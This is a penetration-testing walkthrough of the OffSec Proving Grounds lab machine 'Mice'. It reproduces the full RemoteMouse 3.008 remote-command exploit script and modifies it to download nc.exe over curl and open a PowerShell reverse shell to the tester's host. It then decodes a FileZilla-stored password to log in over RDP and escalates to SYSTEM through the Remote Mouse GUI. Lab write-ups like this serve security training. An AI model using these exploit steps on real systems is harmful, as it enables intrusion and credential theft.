Mice

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.199
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 13:19 EST
Nmap scan report for 192.168.182.199                                                                                                                                        
Host is up, received echo-reply ttl 125 (0.13s latency).                                                                                                                    
Scanned at 2025-11-10 13:19:45 EST for 242s                                                                                                                                 
Not shown: 65530 filtered tcp ports (no-response)                                                                                                                           
PORT     STATE SERVICE        REASON          VERSION
1978/tcp open  remotemouse    syn-ack ttl 125 Emote Remote Mouse
1979/tcp open  unisql-java?   syn-ack ttl 125
1980/tcp open  pearldoc-xact? syn-ack ttl 125
3389/tcp open  ms-wbt-server  syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-11-10T18:23:48+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Issuer: commonName=Remote-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-25T10:09:25
| Not valid after:  2026-02-24T10:09:25
| MD5:   ee3d:e4de:8e91:a5b4:7115:34cb:986a:f8bd
| SHA-1: 093c:db26:68db:b772:9089:ad5a:833b:90f8:d929:4eb7
| -----BEGIN CERTIFICATE-----
| MIIC1jCCAb6gAwIBAgIQdK7WCoPG665IL5mbwZdubTANBgkqhkiG9w0BAQsFADAU
<snipped>
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2025-11-10T18:23:19+00:00
7680/tcp open  pando-pub?     syn-ack ttl 125
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

We have 3 wierd open ports, and rdp on port 3389.

Lets try and connect to one of the first three open ports:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nv 192.168.182.199 1978
(UNKNOWN) [192.168.182.199] 1978 (?) open
SIN 15win nop nop 300

I searched for that on google, and found this:

RemoteMouse 3.008 - Arbitrary Remote Command ExecutionExploit Database

Also the same service name is shown in the nmap result.

We do not the exact version but we will pull this exploit and try it out:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ searchsploit remotemouse 
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
RemoteMouse 3.008 - Arbitrary Remote Command Execution                                                                                    | windows/remote/46697.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ searchsploit -m 46697                                                    
  Exploit: RemoteMouse 3.008 - Arbitrary Remote Command Execution
      URL: https://www.exploit-db.com/exploits/46697
     Path: /usr/share/exploitdb/exploits/windows/remote/46697.py
    Codes: N/A
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Mice/46697.py

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ cat 46697.py
<snipped>

#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv

def Ping(ip):
    try:
        target = socket(AF_INET, SOCK_STREAM)
        target.settimeout(5)
        target.connect((ip, 1978))
        response=target.recv(1048)
        target.close()
        if response=="SIN 15win nop nop 300":
            return True
        else: return False
    except:
        print("ERROR: Request timed out")



def MoveMouse(x,y,ip):
    def SendMouse(command,times,ip):
        for x in range(times):
            target = socket(AF_INET, SOCK_DGRAM)
            target.sendto(command,(ip,1978))
            sleep(0.001)
    if x>0:
        command="mos  5m 1 0"
        SendMouse(command,x,ip)
    elif x<0:
        x=x*-1
        command="mos  5m -1 0"
        SendMouse(command,x,ip)
    if y>0:
        command="mos  5m 0 1"
        SendMouse(command,y,ip)
    elif y<0:
        y=y*-1
        command="mos  6m 0 -1"
        SendMouse(command,y,ip)



def MousePress(command,ip,action="click"):
    if action=="down":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" d"),(ip,1978))
    elif action=="up":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" u"),(ip,1978))
    elif action=="click":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" d"),(ip,1978))
        target.sendto((command+" u"),(ip,1978))
    else: raise Exception('MousePress: No action named "'+str(action)+'"')


def SendString(string,ip):
    for char in string:
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto(characters[char],(ip,1978))
        sleep(0.5)




class mouse:
    leftClick="mos  5R l"
    rightClick="mos  5R r"
    middleClick="mos  5R m"

characters={
    "A":"key  8[ras]116", "B":"key  8[ras]119", "C":"key  8[ras]118", "D":"key  8[ras]113", "E":"key  8[ras]112",
    "F":"key  8[ras]115", "G":"key  8[ras]114", "H":"key  8[ras]125", "I":"key  8[ras]124", "J":"key  8[ras]127",
    "K":"key  8[ras]126", "L":"key  8[ras]121", "M":"key  8[ras]120", "N":"key  8[ras]123", "O":"key  8[ras]122",
    "P":"key  8[ras]101", "Q":"key  8[ras]100", "R":"key  8[ras]103", "S":"key  8[ras]102", "T":"key  7[ras]97",
    "U":"key  7[ras]96", "V":"key  7[ras]99", "W":"key  7[ras]98", "X":"key  8[ras]109", "Y":"key  8[ras]108",
    "Z":"key  8[ras]111",

    "a":"key  7[ras]84", "b":"key  7[ras]87", "c":"key  7[ras]86", "d":"key  7[ras]81", "e":"key  7[ras]80",
    "f":"key  7[ras]83", "g":"key  7[ras]82", "h":"key  7[ras]93", "i":"key  7[ras]92", "j":"key  7[ras]95",
    "k":"key  7[ras]94", "l":"key  7[ras]89", "m":"key  7[ras]88", "n":"key  7[ras]91", "o":"key  7[ras]90",
    "p":"key  7[ras]69", "q":"key  7[ras]68", "r":"key  7[ras]71", "s":"key  7[ras]70", "t":"key  7[ras]65",
    "u":"key  7[ras]64", "v":"key  7[ras]67", "w":"key  7[ras]66", "x":"key  7[ras]77", "y":"key  7[ras]76",
    "z":"key  7[ras]79",

    "1":"key  6[ras]4", "2":"key  6[ras]7", "3":"key  6[ras]6", "4":"key  6[ras]1", "5":"key  6[ras]0",
    "6":"key  6[ras]3", "7":"key  6[ras]2", "8":"key  7[ras]13", "9":"key  7[ras]12", "0":"key  6[ras]5",

    "\n":"key  3RTN", "\b":"key  3BAS", " ":"key  7[ras]21",

    "+":"key  7[ras]30", "=":"key  6[ras]8", "/":"key  7[ras]26", "_":"key  8[ras]106", "<":"key  6[ras]9",
    ">":"key  7[ras]11", "[":"key  8[ras]110", "]":"key  8[ras]104", "!":"key  7[ras]20", "@":"key  8[ras]117",
    "#":"key  7[ras]22", "$":"key  7[ras]17", "%":"key  7[ras]16", "^":"key  8[ras]107", "&":"key  7[ras]19",
    "*":"key  7[ras]31", "(":"key  7[ras]29", ")":"key  7[ras]28", "-":"key  7[ras]24", "'":"key  7[ras]18",
    '"':"key  7[ras]23", ":":"key  7[ras]15", ";":"key  7[ras]14", "?":"key  7[ras]10", "`":"key  7[ras]85",
    "~":"key  7[ras]75", "\\":"key  8[ras]105", "|":"key  7[ras]73", "{":"key  7[ras]78", "}":"key  7[ras]72",
}


def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString("calc.exe",ip)
    sleep(1)
    SendString("\n",ip)
    print("SUCCESS! Process calc.exe has run on target",ip)


def main():
    try:
        targetIP=argv[1]
    except:
        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
        exit()
    if Ping(targetIP)==True:
        PopCalc(targetIP)
    else:
        print("ERROR: Target machine is not running RemoteMouse")
        exit()

if __name__=="__main__":
    main()

I will just edit the cmd to run on the target.

First test on what ports the target can reach to us:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nlvp 80
listening on [any] 80 ...

    SendString("curl http://192.168.45.187:80/test.txt",ip)

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python2 46697.py 192.168.182.199
('SUCCESS! Process calc.exe has run on target', '192.168.182.199')

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.199] 60231
GET /test HTTP/1.1
Host: 192.168.45.187
User-Agent: curl/7.55.1
Accept: */*

Exploitaion:

Lets upload netcat then get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

    SendString("curl http://192.168.45.187:80/nc.exe -o C:\\Windows\\Tasks\\nc.exe",ip)

Rerun the script again.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.182.199 - - [10/Nov/2025 14:23:51] "GET /nc.exe HTTP/1.1" 200 -

Now lets get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...

    SendString("C:\\Windows\\Tasks\\nc.exe 192.168.45.187 80 -e powershell",ip)

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python2 46697.py 192.168.182.199
('SUCCESS! Process calc.exe has run on target', '192.168.182.199')

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.199] 58796
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> whoami
remote-pc\divine

Post-Exploitation:

Doing some local enumeration, we will find filezilla ftp installed on that target:

PS C:\WINDOWS\system32> cd \
PS C:\> dir "Program Files"


    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----         6/21/2021   3:33 AM                Common Files                                                          
d-----         12/6/2021   8:37 PM                FileZilla FTP Client                                                  
d-----        10/19/2021   6:48 AM                Internet Explorer                                                     
d-----        10/19/2021   6:30 AM                Microsoft Update Health Tools                                         
d-----         12/7/2019   1:14 AM                ModifiableWindowsApps                                                 
d-----         6/21/2021   3:34 AM                VMware                                                                
d-----         6/21/2021   3:33 AM                Windows Defender                                                      
d-----         12/6/2021   8:21 PM                Windows Defender Advanced Threat Protection                          
d-----          9/1/2021   8:40 AM                Windows Mail                                                          
d-----        10/19/2021   6:48 AM                Windows Media Player                                                  
d-----         12/7/2019   1:54 AM                Windows Multimedia Platform                                           
d-----         12/7/2019   1:50 AM                Windows NT                                                            
d-----         6/18/2021   5:50 AM                Windows Photo Viewer                                                  
d-----         12/7/2019   1:54 AM                Windows Portable Devices                                              
d-----         12/7/2019   1:31 AM                Windows Security                                                      
d-----         12/7/2019   1:31 AM                WindowsPowerShell

Filezilla ftp has a file contains credentials for several purposes, I searched online for the path of that file:

How to take FileZilla credentials from the software's interface?Super User

We can find under our current user\appdata\roamin\filezilla:

PS C:\> cd \Users\divine\AppData\Roaming
PS C:\Users\divine\AppData\Roaming> dir


    Directory: C:\Users\divine\AppData\Roaming


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         12/6/2021   8:39 PM                Adobe
d-----         12/6/2021   8:40 PM                FileZilla
d---s-        11/10/2025  11:01 AM                Microsoft


PS C:\Users\divine\AppData\Roaming> cd FileZilla
PS C:\Users\divine\AppData\Roaming\FileZilla> dir


    Directory: C:\Users\divine\AppData\Roaming\FileZilla


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         12/6/2021   8:40 PM          18963 filezilla.xml
-a----         12/6/2021   8:40 PM            451 layout.xml
-a----         12/6/2021   8:40 PM          28672 queue.sqlite3
-a----         12/6/2021   8:40 PM            458 recentservers.xml

In recentservers:

PS C:\Users\divine\AppData\Roaming\FileZilla> type recentservers.xml
type recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
        <RecentServers>
                <Server>
                        <Host>ftp.pg</Host> 
                        <Port>21</Port>
                        <Protocol>0</Protocol>
                        <Type>0</Type>
                        <User>divine</User> 
                        <Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
                        <Logontype>1</Logontype>
                        <PasvMode>MODE_DEFAULT</PasvMode>
                        <EncodingType>Auto</EncodingType>
                        <BypassProxy>0</BypassProxy>
                </Server>
        </RecentServers>
</FileZilla3>

I will copy the base64 encoded password, decode it, validate if it it still valid, then authenticate via xfreerdp3 if yes:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ echo 'Q29udHJvbEZyZWFrMTE=' | base64 -d
ControlFreak11

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]                                                                                                                       
└─$ nxc rdp 192.168.182.199 -u divine -p ControlFreak11                                                                                                                     
RDP         192.168.182.199 3389   REMOTE-PC        [*] Windows 10 or Windows Server 2016 Build 19041 (name:REMOTE-PC) (domain:Remote-PC) (nla:False)                       
RDP         192.168.182.199 3389   REMOTE-PC        [+] Remote-PC\divine:ControlFreak11 (Pwn3d!)

It is valid.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ xfreerdp3 /v:192.168.182.199 /u:divine /p:ControlFreak11 /dynamic-resolution /clipboard
<snipped>

Again based on our previous search, I found that we can exploit remote mouse for privilege escalation:

Remote Mouse GUI 3.008 - Local Privilege EscalationExploit Database

We will follow these steps.

First if you can not view the icons under the system tray, just open task manager, and restart windows explorer.

First we will right-click on remote mouse, the preferences:

Go to settings:

Click on change above.

Now in the windows address bar paste cmd.exe:

Here we elevated our privileges to system.

Get the flags:

C:\Users\divine\>type Desktop\local.txt
5948fd6324cdc146cc850881952f1d4d

C:\Users\divine>type \Users\Administrator\Desktop\proof.txt
fb33cfb7a57330065acc2649125f7b39

PreviousBillyboss NextInternal

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagExploitaion:

hashtagPost-Exploitation:

Enumeration:

Port Scanning:

Exploitaion:

Post-Exploitation: